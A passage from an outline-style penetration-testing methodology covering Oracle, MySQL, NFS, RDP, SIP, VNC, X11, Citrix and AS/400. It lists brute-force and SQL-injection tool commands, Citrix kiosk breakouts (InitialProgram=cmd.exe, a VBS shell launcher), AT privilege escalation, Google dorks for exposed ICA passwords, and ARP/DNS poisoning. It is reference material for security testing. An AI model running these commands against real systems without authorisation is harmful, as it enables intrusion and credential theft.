8.21.1.12. LSNrCheck
8.21.1.13. Oracle Security Check (needs credentials)
8.21.1.14. OAT
8.21.1.14.1. sh opwg.sh -s ip_address
8.21.1.14.2. opwg.bat -s ip_address
8.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
8.21.1.15. OScanner
8.21.1.15.1. sh oscanner.sh -s ip_address
8.21.1.15.2. oscanner.exe -s ip_address
8.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
8.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
8.21.1.16. NGS Squirrel for Oracle
8.21.1.17. Service Register
8.21.1.17.1. Service-register.exe ip_address
8.21.1.18. PLSQL Scanner 2008
8.21.2. Oracle Brute Force
8.21.2.1. OAK
8.21.2.1.1. ora-getsid hostname port sid_dictionary_list
8.21.2.1.2. ora-auth-alter-session host port sid username password sql
8.21.2.1.3. ora-brutesid host port start
8.21.2.1.4. ora-pwdbrute host port sid username password-file
8.21.2.1.5. ora-userenum host port sid userlistfile
8.21.2.1.6. ora-ver -e (-f -l -a) host port
8.21.2.2. breakable (Targets Application Server Port)
8.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
8.21.2.3. SQLInjector (Targets Application Server Port)
8.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
8.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
8.21.2.4. Check Password
8.21.2.5. orabf
8.21.2.5.1. orabf [hash]:[username] [options]
8.21.2.6. thc-orakel
8.21.2.6.1. Cracker
8.21.2.6.2. Client
8.21.2.6.3. Crypto
8.21.2.7. DBVisualisor
8.21.2.7.1. Sql scripts from pentest.co.uk
8.21.2.7.2. Manual sql input of previously reported vulnerabilties
8.21.3. Oracle Reference Material
8.21.3.1. Understanding SQL Injection
8.21.3.2. SQL Injection walkthrough
8.21.3.3. SQL Injection by example
8.21.3.4. Advanced SQL Injection in Oracle databases
8.21.3.5. Blind SQL Injection
8.21.3.6. SQL Cheatsheets
8.21.3.6.1. Untitled
8.22. NFS Port 2049 open
8.22.1. NFS Enumeration
8.22.1.1. showmount -e hostname/ip_address
8.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
8.22.2. NFS Brute Force
8.22.2.1. Interact with NFS share and try to add/delete
8.22.2.2. Exploit and Confuse Unix
8.22.3. Examine Configuration Files
8.22.3.1. /etc/exports
8.22.3.2. /etc/lib/nfs/xtab
8.22.4. nmap nse script
8.22.4.1. nfs-showmount
8.23. Compaq/HP Insight Manager Port 2301,2381open
8.23.1. HP Enumeration
8.23.1.1. Authentication Method
8.23.1.1.1. Host OS Authentication
8.23.1.1.2. Default Authentication
8.23.1.2. Wikto
8.23.1.3. Nstealth
8.23.2. HP Bruteforce
8.23.2.1. Hydra
8.23.2.2. Acunetix
8.23.3. Examine Configuration Files
8.23.3.1. path.properties
8.23.3.2. mx.log
8.23.3.3. CLIClientConfig.cfg
8.23.3.4. database.props
8.23.3.5. pg_hba.conf
8.23.3.6. jboss-service.xml
8.23.3.7. .namazurc
8.24. MySQL port 3306 open
8.24.1. Enumeration
8.24.1.1. nmap -A -n -p3306 <IP Address>
8.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
8.24.1.3. telnet IP_Address 3306
8.24.1.4. use test; select * from test;
8.24.1.5. To check for other DB's -- show databases
8.24.2. Administration
8.24.2.1. MySQL Network Scanner
8.24.2.2. MySQL GUI Tools
8.24.2.3. mysqlshow
8.24.2.4. mysqlbinlog
8.24.3. Manual Checks
8.24.3.1. Default usernames and passwords
8.24.3.1.1. username: root password:
8.24.3.1.2. testing
8.24.3.2. Configuration Files
8.24.3.2.1. Operating System
8.24.3.2.2. Command History
8.24.3.2.3. Log Files
8.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
8.24.3.2.5. MySQL data directory (Location specified in my.cnf)
8.24.3.2.6. SSL Check
8.24.3.3. Privilege Escalation
8.24.3.3.1. Current Level of access
8.24.3.3.2. Access passwords
8.24.3.3.3. Create a new user and grant him privileges
8.24.3.3.4. Break into a shell
8.24.4. SQL injection
8.24.4.1. mysql-miner.pl
8.24.4.1.1. mysql-miner.pl http://target/ expected_string database
8.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
8.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
8.24.5. References.
8.24.5.1. Design Weaknesses
8.24.5.1.1. MySQL running as root
8.24.5.1.2. Exposed publicly on Internet
8.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
8.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
8.25. RDesktop port 3389 open
8.25.1. Rdesktop Enumeration
8.25.1.1. Remote Desktop Connection
8.25.2. Rdestop Bruteforce
8.25.2.1. TSGrinder
8.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
8.25.2.2. Tscrack
8.26. Sybase Port 5000+ open
8.26.1. Sybase Enumeration
8.26.1.1. sybase-version ip_address from NGS
8.26.2. Sybase Vulnerability Assessment
8.26.2.1. Use DBVisualiser
8.26.2.1.1. Sybase Security checksheet
8.26.2.1.2. Manual sql input of previously reported vulnerabilties
8.26.2.2. NGS Squirrel for Sybase
8.27. SIP Port 5060 open
8.27.1. SIP Enumeration
8.27.1.1. netcat
8.27.1.1.1. nc IP_Address Port
8.27.1.2. sipflanker
8.27.1.2.1. python sipflanker.py 192.168.1-254
8.27.1.3. Sipscan
8.27.1.4. smap
8.27.1.4.1. smap IP_Address/Subnet_Mask
8.27.1.4.2. smap -o IP_Address/Subnet_Mask
8.27.1.4.3. smap -l IP_Address
8.27.2. SIP Packet Crafting etc.
8.27.2.1. sipsak
8.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
8.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
8.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
8.27.2.2. siprogue
8.27.3. SIP Vulnerability Scanning/ Brute Force
8.27.3.1. tftp bruteforcer
8.27.3.1.1. Default dictionary file
8.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
8.27.3.2. VoIPaudit
8.27.3.3. SiVuS
8.27.4. Examine Configuration Files
8.27.4.1. SIPDefault.cnf
8.27.4.2. asterisk.conf
8.27.4.3. sip.conf
8.27.4.4. phone.conf
8.27.4.5. sip_notify.conf
8.27.4.6. <Ethernet address>.cfg
8.27.4.7. 000000000000.cfg
8.27.4.8. phone1.cfg
8.27.4.9. sip.cfg etc. etc.
8.28. VNC port 5900^ open
8.28.1. VNC Enumeration
8.28.1.1. Scans
8.28.1.1.1. 5900^ for direct access.5800 for HTTP access.
8.28.2. VNC Brute Force
8.28.2.1. Password Attacks
8.28.2.1.1. Remote
8.28.2.1.2. Local
8.28.3. Exmine Configuration Files
8.28.3.1. .vnc
8.28.3.2. /etc/vnc/config
8.28.3.3. $HOME/.vnc/config
8.28.3.4. /etc/sysconfig/vncservers
8.28.3.5. /etc/vnc.conf
8.29. Tor Port 9001, 9030 open
8.29.1. Tor Node Checker
8.29.1.1. Ip Pages
8.29.1.2. Kewlio.net
8.29.2. nmap NSE script
8.30. Jet Direct 9100 open
8.30.1. hijetta
9. X11 port 6000^ open
9.1. X11 Enumeration
9.1.1. List open windows
9.1.2. Authentication Method
9.1.2.1. Xauth
9.1.2.2. Xhost
9.2. X11 Exploitation
9.2.1. xwd
9.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
9.2.2. Keystrokes
9.2.2.1. Received
9.2.2.2. Transmitted
9.2.3. Screenshots
9.2.4. xhost +
9.3. Examine Configuration Files
9.3.1. /etc/Xn.hosts
9.3.2. /usr/lib/X11/xdm
9.3.2.1. Untitled
9.3.3. /usr/lib/X11/xdm/xsession
9.3.4. /usr/lib/X11/xdm/xsession-remote
9.3.5. /usr/lib/X11/xdm/xsession.0
9.3.6. /usr/lib/X11/xdm/xdm-config
9.3.6.1. DisplayManager*authorize:on
10. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
10.1. Default Port Lists
10.1.1. Windows
10.1.2. *nix
10.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
10.2.1. General Enumeration Tools
10.2.1.1. nmap
10.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
10.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
10.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
10.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
10.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
10.2.1.2. netcat
10.2.1.2.1. nc -v -n IP_Address port
10.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
10.2.1.3. amap
10.2.1.3.1. amap -bqv 192.168.1.1 80
10.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
10.2.1.4. xprobe2
10.2.1.4.1. xprobe2 192.168.1.1
10.2.1.5. sinfp
10.2.1.5.1. ./sinfp.pl -i -p
10.2.1.6. nbtscan
10.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
10.2.1.7. hping
10.2.1.7.1. hping ip_address
10.2.1.8. scanrand
10.2.1.8.1. scanrand ip_address:all
10.2.1.9. unicornscan
10.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
10.2.1.10. netenum
10.2.1.10.1. netenum network/netmask timeout
10.2.1.11. fping
10.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
10.2.2. Firewall Specific Tools
10.2.2.1. firewalk
10.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
10.2.2.2. ftester
10.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
10.2.3. Default Passwords (Examine list)
10.2.3.1. Passwords A
10.2.3.2. Passwords B
10.2.3.3. Passwords C
10.2.3.4. Passwords D
10.2.3.5. Passwords E
10.2.3.6. Passwords F
10.2.3.7. Passwords G
10.2.3.8. Passwords H
10.2.3.9. Passwords I
10.2.3.10. Passwords J
10.2.3.11. Passwords K
10.2.3.12. Passwords L
10.2.3.13. Passwords M
10.2.3.14. Passwords N
10.2.3.15. Passwords O
10.2.3.16. Passwords P
10.2.3.17. Passwords R
10.2.3.18. Passwords S
10.2.3.19. Passwords T
10.2.3.20. Passwords U
10.2.3.21. Passwords V
10.2.3.22. Passwords W
10.2.3.23. Passwords X
10.2.3.24. Passwords Y
10.2.3.25. Passwords Z
10.2.3.26. Passwords (Numeric)
10.3. Active Hosts
10.3.1. Open TCP Ports
10.3.2. Closed TCP Ports
10.3.3. Open UDP Ports
10.3.4. Closed UDP Ports
10.3.5. Service Probing
10.3.5.1. SMTP Mail Bouncing
10.3.5.2. Banner Grabbing
10.3.5.2.1. Other
10.3.5.2.2. HTTP
10.3.5.2.3. HTTPS
10.3.5.2.4. SMTP
10.3.5.2.5. POP3
10.3.5.2.6. FTP
10.3.6. ICMP Responses
10.3.6.1. Type 3 (Port Unreachable)
10.3.6.2. Type 8 (Echo Request)
10.3.6.3. Type 13 (Timestamp Request)
10.3.6.4. Type 15 (Information Request)
10.3.6.5. Type 17 (Subnet Address Mask Request)
10.3.6.6. Responses from broadcast address
10.3.7. Source Port Scans
10.3.7.1. TCP/UDP 53 (DNS)
10.3.7.2. TCP 20 (FTP Data)
10.3.7.3. TCP 80 (HTTP)
10.3.7.4. TCP/UDP 88 (Kerberos)
10.3.8. Firewall Assessment
10.3.8.1. Firewalk
10.3.8.2. TCP/UDP/ICMP responses
10.3.9. OS Fingerprint
11. InitialProgram=c:\windows\system32\cmd.exe
12. Set objShell = CreateObject("WScript.Shell")
13. Check visible areas for sensitive information.
14. Citrix Specific Testing
14.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
14.2. Enumeration
14.2.1. web search
14.2.1.1. Google (GHDB)
14.2.1.1.1. ext:ica
14.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
14.2.1.1.3. [WFClient] Password= filetype:ica
14.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
14.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
14.2.1.1.6. inurl:/Citrix/Nfuse17/
14.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
14.2.1.2. Google Hacks (Author Discovered)
14.2.1.2.1. filetype:ica Username=
14.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx
14.2.1.2.3. inurl:/Citrix/AccessPlatform/
14.2.1.2.4. inurl:LogonAgent/Login.asp
14.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp
14.2.1.2.6. inurl:/Citrix/NFuse161/login.asp
14.2.1.2.7. inurl:/Citrix/NFuse16
14.2.1.2.8. inurl:/Citrix/NFuse151/
14.2.1.2.9. allintitle:MetaFrame XP Login
14.2.1.2.10. allintitle:MetaFrame Presentation Server Login
14.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
14.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login
14.2.1.3. Yahoo
14.2.1.3.1. originurlextension:ica
14.2.2. site search
14.2.2.1. Manual
14.2.2.1.1. review web page for useful information
14.2.2.1.2. review source for web page
14.2.3. generic
14.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
14.2.3.2. amap -bqv ip_address port_no.
14.2.4. citrix specific
14.2.4.1. enum.pl
14.2.4.1.1. perl enum.pl ip_address
14.2.4.2. enum.js
14.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
14.2.4.3. connect.js
14.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
14.2.4.4. Citrix-pa-scan
14.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
14.2.4.5. pabrute.c
14.2.4.5.1. ./pabrute pubapp list app_list ip_address
14.2.5. Default Ports
14.2.5.1. TCP
14.2.5.1.1. Citrix XML Service
14.2.5.1.2. Advanced Management Console
14.2.5.1.3. Citrix SSL Relay
14.2.5.1.4. ICA sessions
14.2.5.1.5. Server to server
14.2.5.1.6. Management Console to server
14.2.5.1.7. Session Reliability (Auto-reconnect)
14.2.5.1.8. License Management Console
14.2.5.1.9. License server
14.2.5.2. UDP
14.2.5.2.1. Clients to ICA browser service
14.2.5.2.2. Server-to-server
14.2.6. nmap nse scripts
14.2.6.1. citrix-enum-apps
14.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
14.2.6.2. citrix-enum-apps-xml
14.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
14.2.6.3. citrix-enum-servers
14.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
14.2.6.4. citrix-enum-servers-xml
14.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
14.2.6.5. citrix-brute-xml
14.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
14.3. Scanning
14.3.1. Nessus
14.3.1.1. Plugins
14.3.1.1.1. CGI abuses
14.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
14.3.1.1.3. Misc.
14.3.1.1.4. Service Detection
14.3.1.1.5. Web Servers
14.3.1.1.6. Windows
14.3.2. Nikto
14.3.2.1. perl nikto.pl -host ip_address -port port_no.
14.3.2.1.1. Untitled
14.4. Exploitation
14.4.1. Alter default .ica files
14.4.1.1. InitialProgram=cmd.exe
14.4.1.2. InitialProgram=explorer.exe
14.4.2. Enumerate and Connect
14.4.2.1. For applications identified by Citrix-pa-scan
14.4.2.1.1. Pas
14.4.2.2. For published applications with a Citrix client when the master browser is non-public.
14.4.2.2.1. Citrix-pa-proxy
14.4.3. Manual Testing
14.4.3.1. Create Batch File (cmd.bat)
14.4.3.1.1. 1
14.4.3.1.2. 2
14.4.3.2. Host Scripting File (cmd.vbs)
14.4.3.2.1. Option Explicit
14.4.3.2.2. Dim objShell
14.4.3.2.3. objShell.Run "%comspec% /k"
14.4.3.2.4. WScript.Quit
14.4.3.2.5. alternative functionality
14.4.3.3. iKat
14.4.3.3.1. Integrated Kiosk Attack Tool
14.4.3.4. AT Command - priviledge escalation
14.4.3.4.1. AT HH:MM /interactive "cmd.exe"
14.4.3.4.2. AT HH:MM /interactive %comspec% /k
14.4.3.4.3. Untitled
14.4.3.5. Keyboard Shortcuts/ Hotkeys
14.4.3.5.1. Ctrl + h – View History
14.4.3.5.2. Ctrl + n – New Browser
14.4.3.5.3. Shift + Left Click – New Browser
14.4.3.5.4. Ctrl + o – Internet Address (browse feature)
14.4.3.5.5. Ctrl + p – Print (to file)
14.4.3.5.6. Right Click (Shift + F10)
14.4.3.5.7. F1 – Jump to URL
14.4.3.5.8. SHIFT+F1: Local Task List
14.4.3.5.9. SHIFT+F2: Toggle Title Bar
14.4.3.5.10. SHIFT+F3: Close Remote Application
14.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
14.4.3.5.12. CTRL+F2: Remote Task List
14.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
14.4.3.5.14. ALT+F2: Cycle through programs
14.4.3.5.15. ALT+PLUS: Alt+TAB
14.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
14.5. Brute Force
14.5.1. bforce.js
14.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
14.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
14.5.1.3. Untitled
14.6. Review Configuration Files
14.6.1. Application server configuration file
14.6.1.1. appsrv.ini
14.6.1.1.1. Location
14.6.1.1.2. World writeable
14.6.1.1.3. Review other files
14.6.1.1.4. Sample file
14.6.2. Program Neighborhood configuration file
14.6.2.1. pn.ini
14.6.2.1.1. Location
14.6.2.1.2. Review other files
14.6.2.1.3. Sample file
14.6.3. Citrix ICA client configuration file
14.6.3.1. wfclient.ini
14.6.3.1.1. Location
14.7. References
14.7.1. Vulnerabilities
14.7.1.1. Art of Hacking
14.7.1.2. Common Vulnerabilities and Exploits (CVE)
14.7.1.2.1. Sample file
14.7.1.2.2. Untitled
14.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
14.7.1.3. OSVDB
14.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
14.7.1.4. Secunia
14.7.1.5. Security-database.com
14.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
14.7.1.6. SecurityFocus
14.7.2. Support
14.7.2.1. Citrix
14.7.2.1.1. Knowledge Base
14.7.2.2. Thinworld
14.7.3. Exploits
14.7.3.1. Milw0rm
14.7.3.1.1. http://www.milw0rm.com/search.php
14.7.3.2. Art of Hacking
14.7.3.2.1. Citrix
14.7.4. Tools Resource
14.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access
15. Network Backbone
15.1. Generic Toolset
15.1.1. Wireshark (Formerly Ethereal)
15.1.1.1. Passive Sniffing
15.1.1.1.1. Usernames/Passwords
15.1.1.1.2. Email
15.1.1.1.3. FTP
15.1.1.1.4. HTTP
15.1.1.1.5. HTTPS
15.1.1.1.6. RDP
15.1.1.1.7. VOIP
15.1.1.1.8. Other
15.1.1.2. Filters
15.1.1.2.1. ip.src == ip_address
15.1.1.2.2. ip.dst == ip_address
15.1.1.2.3. tcp.dstport == port_no.
15.1.1.2.4. ! ip.addr == ip_address
15.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
15.1.2. Cain & Abel
15.1.2.1. Active Sniffing
15.1.2.1.1. ARP Cache Poisoning
15.1.2.1.2. DNS Poisoning
15.1.2.1.3. Routing Protocols
15.1.3. Cisco-Torch
15.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
15.1.4. NTP-Fingerprint
15.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
15.1.5. Yersinia
15.1.6. p0f
15.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
15.1.7. Manual Check (Credentials required)
15.1.8. MAC Spoofing
15.1.8.1. mac address changer for windows
15.1.8.2. macchanger
15.1.8.2.1. Random Mac Address:- macchanger -r eth0
15.1.8.3. madmacs
15.1.8.4. smac
15.1.8.5. TMAC
16. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
16.1. Password Attacks
16.1.1. Known Accounts
16.1.1.1. Identified Passwords
16.1.1.2. Unidentified Hashes
16.1.2. Default Accounts
16.1.2.1. Identified Passwords
16.1.2.2. Unidentified Hashes
16.2. Exploits
16.2.1. Successful Exploits
16.2.1.1. Accounts
16.2.1.1.1. Passwords
16.2.1.1.2. Groups
16.2.1.1.3. Other Details
16.2.1.2. Services
16.2.1.3. Backdoor
16.2.1.4. Connectivity
16.2.2. Unsuccessful Exploits
16.2.3. Resources
16.2.3.1. Securiteam
16.2.3.1.1. Exploits are sorted by year and must be downloaded individually
16.2.3.2. SecurityForest
16.2.3.2.1. Updated via CVS after initial install
16.2.3.3. GovernmentSecurity
16.2.3.3.1. Need to create and account to obtain access
16.2.3.4. Red Base Security
16.2.3.4.1. Oracle Exploit site only
16.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
16.2.3.5.1. Wireless Exploit Site
16.2.3.6. PacketStorm Security
16.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
16.2.3.7. SecWatch
16.2.3.7.1. Exploits sorted by year and month, download seperately
16.2.3.8. SecurityFocus
16.2.3.8.1. Exploits must be downloaded individually
16.2.3.9. Metasploit
16.2.3.9.1. Install and regualrly update via svn
16.2.3.10. Milw0rm
16.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
16.3. Tools
16.3.1. Metasploit
16.3.1.1. Free Extra Modules
16.3.1.1.1. local copy
16.3.2. Manual SQL Injection
16.3.2.1. Understanding SQL Injection
16.3.2.2. SQL Injection walkthrough
16.3.2.3. SQL Injection by example
16.3.2.4. Blind SQL Injection
16.3.2.5. Advanced SQL Injection in SQL Server
16.3.2.6. More Advanced SQL Injection
16.3.2.7. Advanced SQL Injection in Oracle databases
16.3.2.8. SQL Cheatsheets
16.3.2.8.1. Untitled
16.3.3. SQL Power Injector
16.3.4. SecurityForest
16.3.5. SPI Dynamics WebInspect
16.3.6. Core Impact
16.3.7. Cisco Global Exploiter
16.3.8. PIXDos
16.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
16.3.9. CANVAS
16.3.10. Inguma
17. Contributors
17.1. Matt Byrne (WirelessDefence.org)
17.1.1. Matt contributed the majority of the Wireless section.
17.2. Arvind Doraiswamy (Paladion.net)
17.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
17.3. Lee Lawson (Dns.co.uk)
17.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.
17.4. Nabil OUCHN (Security-database.com)
18. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
18.1. Manual
18.1.1. Patch Levels
18.1.2. Confirmed Vulnerabilities
18.1.2.1. Severe
18.1.2.2. High
18.1.2.3. Medium
18.1.2.4. Low
18.2. Automated
18.2.1. Reports
18.2.2. Vulnerabilities
18.2.2.1. Severe
18.2.2.2. High
18.2.2.3. Medium
18.2.2.4. Low
18.3. Tools
18.3.1. GFI
18.3.2. Nessus (Linux)
18.3.2.1. Nessus (Windows)
18.3.3. NGS Typhon
18.3.4. NGS Squirrel for Oracle
18.3.5. NGS Squirrel for SQL
18.3.6. SARA
18.3.7. MatriXay
18.3.8. BiDiBlah
18.3.9. SSA
18.3.10. Oval Interpreter
18.3.11. Xscan
18.3.12. Security Manager +
18.3.13. Inguma
18.4. Resources
18.4.1. Security Focus
18.4.2. Microsoft Security Bulletin
18.4.3. Common Vulnerabilities and Exploits (CVE)
18.4.4. National Vulnerability Database (NVD)
18.4.5. The Open Source Vulnerability Database (OSVDB)
18.4.5.1. Standalone Database
18.4.5.1.1. Update URL
18.4.6. United States Computer Emergency Response Team (US-CERT)
18.4.7. Computer Emergency Response Team
18.4.8. Mozilla Security Information
18.4.9. SANS
18.4.10. Securiteam
18.4.11. PacketStorm Security
18.4.12. Security Tracker
18.4.13. Secunia
18.4.14. Vulnerabilities.org
18.4.15. ntbugtraq
18.4.16. Wireless Vulnerabilities and Exploits (WVE)
18.5. Blogs
18.5.1. Carnal0wnage
18.5.2. Fsecure Blog
18.5.3. g0ne blog
18.5.4. GNUCitizen
18.5.5. ha.ckers Blog
18.5.6. Jeremiah Grossman Blog
18.5.7. Metasploit
18.5.8. nCircle Blogs
18.5.9. pentest mokney.net
18.5.10. Rational Security
18.5.11. Rational Security
18.5.12. Rise Security
18.5.13. Security Fix Blog
18.5.14. Software Vulnerability Exploitation Blog
18.5.15. Software Vulnerability Exploitation Blog
18.5.16. Taosecurity Blog
19. AS/400 Auditing
19.1. Remote
19.1.1. Information Gathering
19.1.1.1. Nmap using common iSeries (AS/400) services.
19.1.1.1.1. Unsecured services (Port;name;description)
19.1.1.1.2. Secured services (Port;name;description)
19.1.1.2. NetCat (old school technique)
19.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
19.1.1.3. Banners Grabbing
19.1.1.3.1. Telnet
19.1.1.3.2. FTP
19.1.1.3.3. HTTP Banner
19.1.1.3.4. POP3
19.1.1.3.5. SNMP
19.1.1.3.6. SMTP
19.1.2. Users Enumeration
19.1.2.1. Default AS/400 users accounts
19.1.2.2. Error messages
19.1.2.2.1. Telnet Login errors
19.1.2.2.2. POP3 authentication Errors
19.1.2.3. Qsys symbolic link (if ftp is enabled)
19.1.2.3.1. ftp target | quote stat | quote site namefmt 1
19.1.2.3.2. cd /
19.1.2.3.3. quote site listfmt 1
19.1.2.3.4. mkdir temp
19.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
19.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
19.1.2.3.7. dir /temp/qsys/*.usrprf
19.1.2.4. LDAP
19.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
19.1.2.4.2. Tool to browse LDAP
19.1.3. Exploitation
19.1.3.1. CVE References
19.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
19.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
19.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
19.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
19.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
19.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
19.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
19.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
19.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
19.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
